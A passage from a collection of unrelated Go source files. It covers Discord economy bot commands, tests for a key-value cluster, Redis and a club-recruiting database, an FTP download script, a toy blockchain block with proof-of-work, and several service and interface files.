		s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Withdrew %d coins.", num))
		return
	}
	// "ldb": post page 0 of the guild wallet leaderboard and register the
	// paging reactions handled by ldbPageSwitcher.
	if b.startsWith(m, "ldb") {
		count := b.db.QueryRow("SELECT COUNT(1) FROM currency WHERE guilds LIKE ?", "%"+m.GuildID+"%")
		var num int
		err := count.Scan(&num)
		if b.handle(err, m) {
			return
		}
		res, err := b.db.Query("SELECT user, wallet FROM currency WHERE guilds LIKE ? ORDER BY wallet DESC LIMIT 10", "%"+m.GuildID+"%")
		if b.handle(err, m) {
			return
		}
		defer res.Close()
		var ldb string
		var user string
		var wallet int
		var usr *discordgo.User
		i := 1
		for res.Next() {
			err = res.Scan(&user, &wallet)
			if b.handle(err, m) {
				return
			}
			usr, err = s.User(user)
			if b.handle(err, m) {
				return
			}
			ldb += fmt.Sprintf("%d. %s#%s - %d\n", i, usr.Username, usr.Discriminator, wallet)
			i++
		}
		gld, err := s.Guild(m.GuildID)
		if b.handle(err, m) {
			return
		}
		msg, _ := s.ChannelMessageSendEmbed(m.ChannelID, &discordgo.MessageEmbed{
			Title:       fmt.Sprintf("Richest users in %s", gld.Name),
			Description: ldb,
		})
		s.MessageReactionAdd(m.ChannelID, msg.ID, leftArrow)
		s.MessageReactionAdd(m.ChannelID, msg.ID, rightArrow)
		b.pages[msg.ID] = reactionMsg{
			Type: ldbPageSwitcher,
			Metadata: map[string]interface{}{
				"page":  0,
				"count": num,
			},
			Handler: b.ldbPageSwitcher,
		}
		return
	}
	// "credup": buy credit levels. The price of raising credit from c by n is
	// (c+n)^2 - c^2; "max" searches for the largest affordable n.
	if b.startsWith(m, "credup") {
		user, suc := b.getuser(m, m.Author.ID)
		if !suc {
			return
		}
		var numVal string
		_, err := fmt.Sscanf(m.Content, "credup %s", &numVal)
		if b.handle(err, m) {
			return
		}
		var num int
		if numVal == "max" {
			price := 0
			for price < user.Wallet {
				numoff := num + user.Credit
				price = (numoff * numoff) - (user.Credit * user.Credit)
				num++
			}
			// The loop overshoots by one level; step back if possible.
			if num > 0 {
				num--
			}
		} else {
			num, err = strconv.Atoi(numVal)
			if b.handle(err, m) {
				return
			}
			num = b.abs(num)
		}
		numoff := num + user.Credit
		price := (numoff * numoff) - (user.Credit * user.Credit)
		if user.Wallet < price {
			s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You need %d more coins to upgrade your credit %d levels.", price-user.Wallet, num))
			return
		}
		user.Wallet -= price
		user.Credit += num
		suc = b.updateuser(m, user)
		if !suc {
			return
		}
		s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You upgraded your credit by %d levels!", num))
		return
	}
	// "donate": transfer wallet coins to a mentioned user (not yourself).
	if b.startsWith(m, "donate") {
		b.checkuser(m)
		if !(len(m.Mentions) > 0) {
			s.ChannelMessageSend(m.ChannelID, "You need to mention the person you are going to donate to!")
			return
		}
		if m.Mentions[0].ID == m.Author.ID {
			s.ChannelMessageSend(m.ChannelID, "You can't donate to yourself!")
			return
		}
		b.checkuserwithid(m, m.Mentions[0].ID)
		user1, suc := b.getuser(m, m.Author.ID)
		if !suc {
			return
		}
		var num int
		_, err := fmt.Sscanf(m.Content, "donate %d", &num)
		if b.handle(err, m) {
			return
		}
		num = b.abs(num)
		if user1.Wallet < num {
			s.ChannelMessageSend(m.ChannelID, "You don't have that much money to give!")
			return
		}
		user2, suc := b.getuser(m, m.Mentions[0].ID)
		if !suc {
			return
		}
		user1.Wallet -= num
		user2.Wallet += num
		b.updateuser(m, user1)
		b.updateuser(m, user2)
		s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Successfully donated %d coins to <@%s>!", num, m.Mentions[0].ID))
	}
}
|
package kvs_test
import (
"errors"
"fmt"
"time"
. "github.com/bryanl/dolb/kvs"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
// Ginkgo suite for Cluster: agent registration, leader lookup, and TTL
// refresh, all exercised against a MockKVS.
var _ = Describe("Cluster", func() {
	var (
		err      error
		kvs      *MockKVS
		checkTTL = time.Millisecond * 10
		cluster  *Cluster
		failErr  = errors.New("fail")
	)
	BeforeEach(func() {
		kvs = &MockKVS{}
		cluster = NewCluster(kvs, checkTTL)
	})
	Describe("RegisterAgent", func() {
		var (
			index uint64
		)
		JustBeforeEach(func() {
			index, err = cluster.RegisterAgent("agent1")
		})
		Context("with success", func() {
			BeforeEach(func() {
				opts := &SetOptions{TTL: checkTTL}
				node := &Node{ModifiedIndex: 1}
				kvs.On("Set", "/agent/leader/agent1", "agent1", opts).Return(node, nil)
			})
			It("doesn't return an error", func() {
				Ω(err).ToNot(HaveOccurred())
			})
			It("returns the last modified index", func() {
				// NOTE(review): uint64 index can never Equal the untyped int 1,
				// so this assertion is vacuous — confirm intent.
				Ω(index).ToNot(Equal(1))
			})
		})
		Context("with kv error", func() {
			BeforeEach(func() {
				opts := &SetOptions{TTL: checkTTL}
				kvs.On("Set", "/agent/leader/agent1", "agent1", opts).Return(nil, failErr)
			})
			It("returns an error", func() {
				Ω(err).To(HaveOccurred())
			})
		})
	})
	Describe("Leader", func() {
		var (
			leader *Leader
		)
		JustBeforeEach(func() {
			leader, err = cluster.Leader()
		})
		Context("with nodes", func() {
			BeforeEach(func() {
				opts := &GetOptions{Recursive: true}
				rootNode := &Node{Nodes: Nodes{}}
				// Three nodes with ascending CreatedIndex; the oldest wins.
				for i := uint64(1); i <= 3; i++ {
					rootNode.Nodes = append(rootNode.Nodes, &Node{CreatedIndex: i + 1, Value: fmt.Sprintf("node%d", i)})
				}
				kvs.On("Get", cluster.LeaderKey, opts).Return(rootNode, nil)
			})
			It("returns the leader", func() {
				Ω(leader).To(Equal(&Leader{Name: "node1", NodeCount: 3}))
			})
			It("doesn't return an error", func() {
				Ω(err).ToNot(HaveOccurred())
			})
		})
		Context("with no nodes", func() {
			BeforeEach(func() {
				opts := &GetOptions{Recursive: true}
				rootNode := &Node{Nodes: Nodes{}}
				kvs.On("Get", cluster.LeaderKey, opts).Return(rootNode, nil)
			})
			It("returns an error", func() {
				Ω(err).To(HaveOccurred())
			})
		})
		Context("with leader retrieval error", func() {
			BeforeEach(func() {
				opts := &GetOptions{Recursive: true}
				kvs.On("Get", cluster.LeaderKey, opts).Return(nil, failErr)
			})
			It("returns an error", func() {
				Ω(err).To(HaveOccurred())
			})
		})
	})
	Describe("Refresh", func() {
		var (
			index uint64
		)
		JustBeforeEach(func() {
			index, err = cluster.Refresh("agent1", 5)
		})
		Context("with no error", func() {
			BeforeEach(func() {
				opts := &SetOptions{
					TTL:       checkTTL,
					PrevIndex: 5,
				}
				node := &Node{ModifiedIndex: 6}
				kvs.On("Set", cluster.LeaderKey+"/agent1", "agent1", opts).Return(node, nil)
			})
			It("doesn't return an error", func() {
				Ω(err).ToNot(HaveOccurred())
			})
			It("returns the new index", func() {
				Ω(index).To(Equal(uint64(6)))
			})
		})
		Context("with an error", func() {
			BeforeEach(func() {
				opts := &SetOptions{
					TTL:       checkTTL,
					PrevIndex: 5,
				}
				kvs.On("Set", cluster.LeaderKey+"/agent1", "agent1", opts).Return(nil, failErr)
			})
			It("returns an error", func() {
				Ω(err).To(HaveOccurred())
			})
		})
	})
})
|
package redis_test
import (
"os"
"testing"
"time"
"github.com/caarlos0/env"
"github.com/go-redis/redis"
. "web-layout/utils/redis"
)
// TestConnect verifies that a Config populated from environment variables can
// establish a connection and perform a simple SET.
// Integration test: requires a Redis instance at 127.0.0.1:6379.
func TestConnect(t *testing.T) {
	os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
	os.Setenv("REDIS_PWD", "")
	os.Setenv("REDIS_POOL_SIZE", "100")
	os.Setenv("REDIS_DB", "1")
	c := Config{}
	if err := env.Parse(&c); err != nil {
		t.Error(err)
		return
	}
	redisPool, err := c.Connect()
	if err != nil {
		t.Error(err)
		return
	}
	res, err := redisPool.Set("test_key1", "test_value", time.Minute*10).Result()
	if err != nil {
		t.Error(err)
		return
	}
	t.Log(res)
}
// TestRedis_Hash exercises HSet / HGetAll / HGet.
// Integration test: requires a Redis instance at 127.0.0.1:6379.
func TestRedis_Hash(t *testing.T) {
	os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
	os.Setenv("REDIS_PWD", "")
	os.Setenv("REDIS_POOL_SIZE", "100")
	os.Setenv("REDIS_DB", "1")
	c := Config{}
	if err := env.Parse(&c); err != nil {
		t.Error(err)
		return
	}
	redisPool, err := c.Connect()
	if err != nil {
		t.Error(err)
		return
	}
	hashKey := "HashKey"
	data := map[string]interface{}{
		"field1": "value1",
		"field2": 2,
		"field3": true,
	}
	// Store each field individually.
	for k, v := range data {
		_, err := redisPool.HSet(hashKey, k, v).Result()
		if err != nil {
			t.Error(err)
			return
		}
	}
	// get all
	results, err := redisPool.HGetAll(hashKey).Result()
	if err != nil {
		t.Error(err)
		return
	}
	t.Log("HGetAll Results : ", results)
	// get certain field
	value, err := redisPool.HGet(hashKey, "field1").Result()
	if err != nil {
		t.Error(err)
		return
	}
	t.Log("HGet field1 : ", value)
}
// TestRedis_Sorted_Sets exercises ZIncr and ZRevRangeWithScores.
// Integration test: requires a Redis instance at 127.0.0.1:6379.
func TestRedis_Sorted_Sets(t *testing.T) {
	os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
	os.Setenv("REDIS_PWD", "")
	os.Setenv("REDIS_POOL_SIZE", "100")
	os.Setenv("REDIS_DB", "1")
	c := Config{}
	if err := env.Parse(&c); err != nil {
		t.Error(err)
		return
	}
	redisPool, err := c.Connect()
	if err != nil {
		t.Error(err)
		return
	}
	sortedSetKey := "SortedSets"
	data := map[interface{}]float64{
		"player1": 12,
		"player2": 2,
		"player3": 3,
	}
	// Apply the scores twice; ZIncr accumulates.
	for i := 0; i < 2; i++ {
		for k, v := range data {
			_, err := redisPool.ZIncr(sortedSetKey, redis.Z{
				Member: k,
				Score:  v,
			}).Result()
			if err != nil {
				t.Error(err)
				return
			}
		}
	}
	// Fetch entries by rank, highest score first.
	// (There are several other retrieval methods as well.)
	results, err := redisPool.ZRevRangeWithScores(sortedSetKey, 0, 10).Result()
	if err != nil {
		t.Error(err)
		return
	}
	for _, v := range results {
		t.Log(v)
	}
}
// TestRedis_Lists exercises LPush / LLen / LPop.
// Integration test: requires a Redis instance at 127.0.0.1:6379.
func TestRedis_Lists(t *testing.T) {
	os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
	os.Setenv("REDIS_PWD", "")
	os.Setenv("REDIS_POOL_SIZE", "100")
	os.Setenv("REDIS_DB", "1")
	c := Config{}
	if err := env.Parse(&c); err != nil {
		t.Error(err)
		return
	}
	redisPool, err := c.Connect()
	if err != nil {
		t.Error(err)
		return
	}
	// Push a mixed batch of values onto the list.
	listKey := "List"
	data := []interface{}{
		true,
		12,
		"test",
		22,
		"player3",
		3.9,
	}
	_, err = redisPool.LPush(listKey, data...).Result()
	if err != nil {
		t.Error(err)
		return
	}
	// Read back the list length.
	// Renamed from `len`, which shadowed the builtin len function.
	length, err := redisPool.LLen(listKey).Result()
	if err != nil {
		t.Error(err)
		return
	}
	t.Log("LLen = ", length)
	// Pop one element from the head of the list.
	popData, err := redisPool.LPop(listKey).Result()
	if err != nil {
		t.Error(err)
		return
	}
	t.Log("LPop = ", popData)
}
|
package main
import (
"os"
"fmt"
"github.com/secsy/goftp"
"bytes"
"log"
"io/ioutil"
"time"
// "path"
)
// getEnv reads the named environment variable, returning fallback when the
// variable is not set at all (an empty-but-set variable is returned as is).
func getEnv(key, fallback string) string {
	if v, ok := os.LookupEnv(key); ok {
		return v
	}
	return fallback
}
func main() {
config := goftp.Config {
User: "anonymous",
Password: "root@local.me",
ConnectionsPerHost: 21,
Timeout: 30 * time.Second,
Logger: os.Stderr,
}
ftpServer := getEnv("FTP_SERVER", "localhost" )
client, dailErr := goftp.DialConfig(config, ftpServer)
if dailErr != nil {
log.Fatal(dailErr)
panic(dailErr)
}
dir := getEnv("FTP_DIRECTORY", "/" )
download := getEnv("DOWNLOAD_FILES", "no" )
// files , err := client.ReadDir(dir)
files , err := client.ReadDir(dir)
if err != nil {
panic(err)
}
for _ , file := range files {
// if file.IsDir() {
// path.Join(dir, file.Name())
// } else {
if download == "yes" {
ret_file := file.Name()
fmt.Println("Retrieving file: ", ret_file)
buf := new(bytes.Buffer)
fullPathFile := dir + ret_file
rferr := client.Retrieve(fullPathFile, buf)
if rferr != nil {
panic(rferr)
}
fmt.Println("writing data to file", ret_file)
fmt.Println("Opening file", ret_file,"for writing")
w , _ := ioutil.ReadAll(buf)
ferr := ioutil.WriteFile(ret_file, w , 0644)
if ferr != nil {
log.Fatal(ferr)
panic(ferr)
} else {
fmt.Println("Writing", ret_file ," completed")
}
} else {
fmt.Println("the file is:", file.Name())
}
// }
}
} |
package datastore
import (
"github.com/jakewitcher/pos-server/graph/model"
)
// Package-level provider singletons. Each is declared as an interface so a
// concrete datastore implementation can be assigned at startup (and swapped
// out in tests).
var (
	Customers CustomerProvider
	Stores    StoreProvider
	Employees EmployeeProvider
	Users     UserProvider
)
// CustomerProvider defines create/update/delete and lookup operations over
// customers. Mutating methods return the affected record.
type CustomerProvider interface {
	CreateCustomer(newCustomer model.NewCustomerInput) (*model.Customer, error)
	UpdateCustomer(updatedCustomer model.CustomerInput) (*model.Customer, error)
	DeleteCustomer(customerId string) (*model.Customer, error)
	FindCustomerById(customerId string) (*model.Customer, error)
	// FindCustomers returns the customers matching filter.
	FindCustomers(filter *model.CustomerFilter) ([]*model.Customer, error)
}
// StoreProvider defines create/update/delete and lookup operations over
// stores. Mutating methods return the affected record.
type StoreProvider interface {
	CreateStore(newStore model.NewStoreInput) (*model.Store, error)
	UpdateStore(updatedStore model.StoreInput) (*model.Store, error)
	DeleteStore(storeId string) (*model.Store, error)
	FindStoreById(storeId string) (*model.Store, error)
	// FindStores returns the stores matching filter.
	FindStores(filter *model.StoreFilter) ([]*model.Store, error)
}
// EmployeeProvider defines create/update/delete and lookup operations over
// employees. Unlike the other providers, FindEmployees takes no filter.
type EmployeeProvider interface {
	CreateEmployee(newEmployee model.NewEmployeeInput) (*model.Employee, error)
	UpdateEmployee(updatedEmployee model.EmployeeInput) (*model.Employee, error)
	DeleteEmployee(employeeId string) (*model.Employee, error)
	FindEmployeeById(employeeId string) (*model.Employee, error)
	FindEmployees() ([]*model.Employee, error)
}
// UserProvider defines user persistence; currently only creation is needed.
type UserProvider interface {
	CreateUser(newUser model.NewUserInput) (*model.User, error)
}
|
package main
import (
"crypto/sha256"
"encoding/hex"
"fmt"
"strconv"
"strings"
"time"
)
// Block is one link of the chain: a batch of transactions plus the
// proof-of-work metadata (difficulty, nonce, hashes) that ties it to its
// predecessor.
type Block struct {
	Index        int      // position in the chain; previous.Index + 1
	Timestamp    string   // creation time, formatted by time.Time.String
	Transactions []Taction
	Hash         string   // hash of this block's contents (see calculateHash)
	PrevHash     string   // Hash of the preceding block
	Difficulty   int      // number of leading '0's required of Hash
	//in real bitcoin, nonce is 4 bytes
	//string in golang is pointer (of size 8 bytes)
	Nonce string
}
// validate reports whether b is a legal successor of previous: the index
// must advance by exactly one, the previous hash must chain correctly, and
// b's stored hash must match a recomputation over its contents.
// Usage is block.validate(previous).
func (b *Block) validate(previous *Block) bool {
	switch {
	case previous.Index+1 != b.Index:
		return false
	case previous.Hash != b.PrevHash:
		return false
	case b.calculateHash() != b.Hash:
		return false
	default:
		return true
	}
}
// calculateHash returns the hex-encoded SHA-256 digest of the block's
// index, timestamp, transaction IDs, previous hash and nonce, concatenated
// in that order. Usage is block.calculateHash().
func (b *Block) calculateHash() string {
	var sb strings.Builder
	sb.WriteString(strconv.Itoa(b.Index))
	sb.WriteString(b.Timestamp)
	for _, tact := range b.Transactions {
		sb.WriteString(tact.ID)
	}
	sb.WriteString(b.PrevHash)
	sb.WriteString(b.Nonce)
	sum := sha256.Sum256([]byte(sb.String()))
	return hex.EncodeToString(sum[:])
}
// hasTransaction reports whether t appears in the block's transaction
// list, using Taction.equals for the comparison.
func (b *Block) hasTransaction(t Taction) bool {
	for i := range b.Transactions {
		if b.Transactions[i].equals(t) {
			return true
		}
	}
	return false
}
// equals reports whether b and otherBlock carry identical contents: all
// scalar fields must match and the two blocks must hold the same
// transactions.
func (b *Block) equals(otherBlock Block) bool {
	if b.Index != otherBlock.Index {
		return false
	}
	if b.Timestamp != otherBlock.Timestamp {
		return false
	}
	if b.PrevHash != otherBlock.PrevHash {
		return false
	}
	if b.Hash != otherBlock.Hash {
		return false
	}
	if b.Difficulty != otherBlock.Difficulty {
		return false
	}
	if b.Nonce != otherBlock.Nonce {
		return false
	}
	// BUG FIX: the original only checked that every transaction of b appears
	// in otherBlock, so a block whose transactions were a strict subset of
	// the other's compared as equal. Require matching counts as well.
	if len(b.Transactions) != len(otherBlock.Transactions) {
		return false
	}
	for _, bTaction := range b.Transactions {
		if !otherBlock.hasTransaction(bTaction) {
			return false
		}
	}
	return true
}
// generateBlock mines the next block on top of oldBlock: it prepends a
// coinbase (mining-reward) transaction to tactions, brute-forces a nonce
// until the block hash satisfies the difficulty target, then updates the
// ownership records. If the global chain tip moves while mining, the
// uncommitted transactions are re-queued and mining restarts on the new tip.
func generateBlock(oldBlock Block, tactions []Taction, difficulty int) Block {
	var newBlock Block
	t := time.Now()
	//privKey := getPrivateKey(publicKey)
	//this transaction is reward for mining the block
	newTOut := tactionOut{
		getThisPublicKey(),
		1}
	newTIn := tactionIn{
		"",
		"",
		0,
		"" }
	newTrans := Taction{
		"",
		newTOut,
		newTIn }
	newTrans.TIn.Signature = (*Taction).SignTaction(&newTrans)
	coinbaseTaction := newTrans
	newBlock.Index = oldBlock.Index + 1
	newBlock.Timestamp = t.String()
	// The coinbase transaction always sits first in the block.
	newBlock.Transactions = append([]Taction{coinbaseTaction}, tactions...)
	newBlock.PrevHash = oldBlock.Hash
	newBlock.Difficulty = difficulty
	// Proof of work: try nonces 0, 1, 2, ... (hex-encoded) until valid.
	for i := 0; ; i++ {
		hexVal := fmt.Sprintf("%x", i)
		newBlock.Nonce = hexVal
		hash := newBlock.calculateHash()
		if !isHashValid(hash, newBlock.Difficulty) {
			// if someone else has beaten us to this block, make a new block with this data.
			if !oldBlock.equals(Blockchain[len(Blockchain)-1]) {
				// Re-queue whichever of our transactions the winning block
				// did not commit, then restart mining from the new tip.
				missingTactions := filterCommittedTactions(tactions)
				pendingTransactions = append(pendingTransactions, missingTactions...)
				return generateBlock(Blockchain[len(Blockchain)-1], pendingTransactions, difficulty)
			}
			fmt.Println(hash, " do more work!")
			// NOTE(review): the 1s sleep limits mining to one nonce per
			// second — presumably to pace the demo output; confirm before
			// relying on this for throughput.
			time.Sleep(time.Second)
			continue
		} else {
			fmt.Println(hash, " work done!")
			newBlock.Hash = hash
			break
		}
	}
	newBlock.updateNewOwnership()
	newBlock.deleteOldOwnership()
	return newBlock
}
// isHashValid reports whether hash satisfies the proof-of-work target,
// i.e. begins with `difficulty` consecutive '0' characters.
func isHashValid(hash string, difficulty int) bool {
	target := strings.Repeat("0", difficulty)
	return strings.HasPrefix(hash, target)
}
/*
func (b *Block) getWalletAmt(privKey string) float64 {
var wallet float64
wallet = 0
for _, trans := range b.Transactions {
if trans.PrivateKey2 == privKey {
wallet += trans.Amount
}
if trans.PrivateKey1 == privKey {
wallet -= trans.Amount
}
}
return wallet
}
*/
|
package logic
import (
"context"
"github.com/just-coding-0/learn_example/micro_service/zero/rpc/history/history"
"github.com/just-coding-0/learn_example/micro_service/zero/internal/svc"
"github.com/just-coding-0/learn_example/micro_service/zero/internal/types"
"github.com/tal-tech/go-zero/core/logx"
)
// GetEchoLogic carries the request-scoped context and shared service
// dependencies needed to serve the GetEcho endpoint. The embedded
// logx.Logger is bound to ctx so log lines carry request metadata.
type GetEchoLogic struct {
	logx.Logger
	ctx    context.Context
	svcCtx *svc.ServiceContext
}
// NewGetEchoLogic builds a GetEchoLogic bound to the given request context
// and shared service context.
func NewGetEchoLogic(ctx context.Context, svcCtx *svc.ServiceContext) GetEchoLogic {
	logic := GetEchoLogic{
		Logger: logx.WithContext(ctx),
		ctx:    ctx,
		svcCtx: svcCtx,
	}
	return logic
}
// GetEcho forwards the echo lookup to the history RPC service and adapts
// its reply into the HTTP response type.
func (l *GetEchoLogic) GetEcho(req types.GetEchoStatsRequest) (*types.GetEchoStatsResponse, error) {
	in := &history.GetRequest{Msg: req.Msg}
	resp, err := l.svcCtx.History.Get(l.ctx, in)
	if err != nil {
		return nil, err
	}
	out := &types.GetEchoStatsResponse{
		LastEcho: resp.LastEcho,
		Times:    resp.Times,
		Msg:      resp.Msg,
	}
	return out, nil
}
|
package integration_test
import (
"github.com/cloudfoundry/libbuildpack/cutlass"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
// Registers a ginkgo integration spec verifying that a supply buildpack
// (dotnet-core) run before the staticfile buildpack makes its dependency
// available in the runtime container.
var _ = Describe("running supply buildpacks before the staticfile buildpack", func() {
	var app *cutlass.App
	// Tear down the pushed app after every spec.
	AfterEach(func() {
		if app != nil {
			app.Destroy()
		}
		app = nil
	})
	Context("the app is pushed once", func() {
		BeforeEach(func() {
			// Multi-buildpack pushes require CF API > 2.65.1.
			if ok, err := cutlass.ApiGreaterThan("2.65.1"); err != nil || !ok {
				Skip("API version does not have multi-buildpack support")
			}
			app = cutlass.New(Fixtures("fake_supply_staticfile_app"))
			// dotnet-core runs as the supply buildpack; staticfile is final.
			app.Buildpacks = []string{
				"https://github.com/cloudfoundry/dotnet-core-buildpack#master",
				"staticfile_buildpack",
			}
			app.Disk = "1G"
		})
		It("finds the supplied dependency in the runtime container", func() {
			PushAppAndConfirm(app)
			Expect(app.Stdout.String()).To(ContainSubstring("Supplying Dotnet Core"))
			Expect(app.GetBody("/")).To(ContainSubstring("This is an example app for Cloud Foundry that is only static HTML/JS/CSS assets."))
		})
	})
})
|
package database
import (
"reflect"
"testing"
"github.com/ubclaunchpad/pinpoint/protobuf/models"
)
// club is the fixture club created (and deleted) by every test in this file.
var club = &models.Club{
	ClubID:      "1234",
	Description: "1337 h4x0r",
}

// user is the fixture club member passed to AddNewClub alongside club.
var user = &models.ClubUser{
	ClubID: "1234",
	Email:  "abc@def.com",
	Role:   "Artist",
}
// TestDatabase_AddNewEvent_GetEvent table-tests AddNewEvent, GetEvent and
// GetEvents against a freshly created fixture club, covering an invalid
// event, an invalid club ID, and the happy path.
func TestDatabase_AddNewEvent_GetEvent(t *testing.T) {
	type args struct {
		clubID string
		event  *models.EventProps
	}
	// errs records, per operation, whether an error is expected.
	type errs struct {
		addEvent  bool
		getEvent  bool
		getEvents bool
	}
	tests := []struct {
		name      string
		args      args
		err       errs
		wantEvent bool
	}{
		{"invalid event", args{
			"1234",
			&models.EventProps{},
		}, errs{true, true, true}, false},
		{"invalid club id", args{
			"",
			&models.EventProps{
				Period:  "Winter 2019",
				EventID: "001",
				Name:    "Recruiting",
			},
		}, errs{true, true, true}, false},
		{"valid", args{
			"1234",
			&models.EventProps{
				Period:  "Winter 2019",
				EventID: "001",
				Name:    "Recruiting",
			},
		}, errs{false, false, false}, true},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Fresh DB per case; club and event are cleaned up via defers.
			db, _ := newTestDB(t)
			defer db.DeleteClub(club.ClubID)
			db.AddNewClub(club, user)
			defer db.DeleteEvent(tt.args.clubID, tt.args.event.Period, tt.args.event.EventID)
			if err := db.AddNewEvent(tt.args.clubID, tt.args.event); (err != nil) != tt.err.addEvent {
				t.Errorf("Database.AddNewEvent() error = %v, wantErr %v", err, tt.err.addEvent)
			}
			event, err := db.GetEvent(tt.args.clubID, tt.args.event.Period, tt.args.event.EventID)
			if (err != nil) != tt.err.getEvent {
				t.Errorf("Database.GetEvent() error = %v, wantErr %v", err, tt.err.getEvent)
				return
			}
			// Single-event lookup must round-trip the stored properties.
			if tt.wantEvent {
				if !tt.err.getEvent && !reflect.DeepEqual(tt.args.event, event) {
					t.Errorf("expected: %+v, actual: %+v", tt.args.event, event)
					return
				}
			} else {
				if event != nil {
					t.Errorf("Didn't expect event, got: %+v", event)
				}
			}
			events, err := db.GetEvents(tt.args.clubID, tt.args.event.Period)
			if (err != nil) != tt.err.getEvents {
				t.Errorf("Database.GetEvents() error = %v, wantErr %v", err, tt.err.getEvents)
				return
			}
			// Listing for the period must contain exactly the one event.
			if tt.wantEvent {
				expected := []*models.EventProps{tt.args.event}
				if !tt.err.getEvent && !reflect.DeepEqual(expected, events) {
					t.Errorf("expected: %+v, actual: %+v", expected, events)
					return
				}
			} else {
				if len(events) > 0 {
					t.Errorf("Didn't expect events, got: %+v", events)
				}
			}
		})
	}
}
// TestDatabase_Applicant table-tests AddNewApplicant, GetApplicant and
// GetApplicants against a freshly created fixture club, covering an invalid
// applicant, an invalid club ID, and the happy path.
func TestDatabase_Applicant(t *testing.T) {
	type args struct {
		clubID    string
		applicant *models.Applicant
	}
	// errs records, per operation, whether an error is expected.
	type errs struct {
		addApplicant  bool
		getApplicant  bool
		getApplicants bool
	}
	tests := []struct {
		name          string
		args          args
		err           errs
		wantApplicant bool
	}{
		{"invalid applicant", args{
			"",
			&models.Applicant{},
		}, errs{true, true, true}, false},
		{"invalid club id", args{
			"",
			&models.Applicant{
				Period: "Winter Semester",
				Email:  user.Email,
				Name:   "Bob",
			},
		}, errs{true, true, true}, false},
		{"valid", args{
			"1234",
			&models.Applicant{
				Period: "Winter Semester",
				Email:  user.Email,
				Name:   "Rob",
			},
		}, errs{false, false, false}, true},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			db, _ := newTestDB(t)
			defer db.DeleteClub(club.ClubID)
			db.AddNewClub(club, user)
			defer db.DeleteApplicant(tt.args.clubID, tt.args.applicant.Period, tt.args.applicant.Email)
			// BUG FIX: the failure messages below previously named the wrong
			// methods (AddNewClub/GetClub), copied from another test.
			if err := db.AddNewApplicant(tt.args.clubID, tt.args.applicant); (err != nil) != tt.err.addApplicant {
				t.Errorf("Database.AddNewApplicant() error = %v, wantErr %v", err, tt.err.addApplicant)
			}
			app, err := db.GetApplicant(tt.args.clubID, tt.args.applicant.Period, tt.args.applicant.Email)
			if (err != nil) != tt.err.getApplicant {
				t.Errorf("Database.GetApplicant() error = %v, wantErr %v", err, tt.err.getApplicant)
			}
			if tt.wantApplicant {
				if !reflect.DeepEqual(tt.args.applicant, app) {
					t.Errorf("Failed to get expect applicant, expected: %+v, actual: %+v", tt.args.applicant, app)
					return
				}
			}
			apps, err := db.GetApplicants(tt.args.clubID, tt.args.applicant.Period)
			if (err != nil) != tt.err.getApplicants {
				t.Errorf("Database.GetApplicants() error = %v, wantErr %v", err, tt.err.getApplicants)
			}
			if tt.wantApplicant {
				if !reflect.DeepEqual([]*models.Applicant{tt.args.applicant}, apps) {
					t.Errorf("Failed to get expect applicants, expected: %+v, actual: %+v", []*models.Applicant{tt.args.applicant}, apps)
					return
				}
			} else {
				if len(apps) > 0 {
					// Message fixed: these are applicants, not tags.
					t.Errorf("Didn't expect applicants, got: %+v", apps)
				}
			}
		})
	}
}
// TestDatabase_Application table-tests AddNewApplication, GetApplication and
// GetApplications against a freshly created fixture club, covering an
// invalid application, an invalid club ID, and the happy path. Applications
// are compared on their key fields (Period/EventID/Email) only.
func TestDatabase_Application(t *testing.T) {
	type args struct {
		clubID      string
		application *models.Application
	}
	// errs records, per operation, whether an error is expected.
	type errs struct {
		addApplication  bool
		getApplication  bool
		getApplications bool
	}
	tests := []struct {
		name            string
		args            args
		err             errs
		wantApplication bool
	}{
		{"invalid applicant", args{
			"1234",
			&models.Application{},
		}, errs{true, true, true}, false},
		{"invalid club id", args{
			"",
			&models.Application{
				Period:  "Winter 2019",
				EventID: "001",
				Email:   "abc@def.com",
				Name:    "Recruiting",
				Entries: map[string]*models.FieldEntry{},
			},
		}, errs{true, true, true}, false},
		{"valid", args{
			"1234",
			&models.Application{
				Period:  "Winter 2019",
				EventID: "001",
				Email:   "abc@def.com",
				Name:    "Recruiting",
				Entries: map[string]*models.FieldEntry{},
			},
		}, errs{false, false, false}, true},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			db, _ := newTestDB(t)
			defer db.DeleteClub(club.ClubID)
			db.AddNewClub(club, user)
			defer db.DeleteApplication(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID, tt.args.application.Email)
			if err := db.AddNewApplication(tt.args.clubID, tt.args.application); (err != nil) != tt.err.addApplication {
				t.Errorf("Database.AddNewApplication() error = %v, wantErr %v", err, tt.err.addApplication)
			}
			app, err := db.GetApplication(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID, tt.args.application.Email)
			if (err != nil) != tt.err.getApplication {
				t.Errorf("Database.GetApplication() error = %v, wantErr %v", err, tt.err.getApplication)
			}
			// BUG FIX: checkApp previously compared its first argument against
			// the captured `app` variable instead of its `expected` parameter,
			// so the GetApplications loop below never actually checked apps[i].
			checkApp := func(actual, expected *models.Application) bool {
				return actual.Period == expected.Period &&
					actual.EventID == expected.EventID &&
					actual.Email == expected.Email
			}
			if tt.wantApplication {
				if !checkApp(tt.args.application, app) {
					t.Errorf("Failed to get expected application, expected: %+v, actual: %+v", *tt.args.application, *app)
					return
				}
			}
			apps, err := db.GetApplications(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID)
			if (err != nil) != tt.err.getApplications {
				t.Errorf("Database.GetApplications() error = %v, wantErr %v", err, tt.err.getApplications)
			}
			if tt.wantApplication {
				expected := []*models.Application{tt.args.application}
				for i := 0; i < len(apps); i++ {
					if !checkApp(apps[i], expected[i]) {
						t.Errorf("Failed to get expected applications, expected: %+v, actual: %+v", expected, apps)
						return
					}
				}
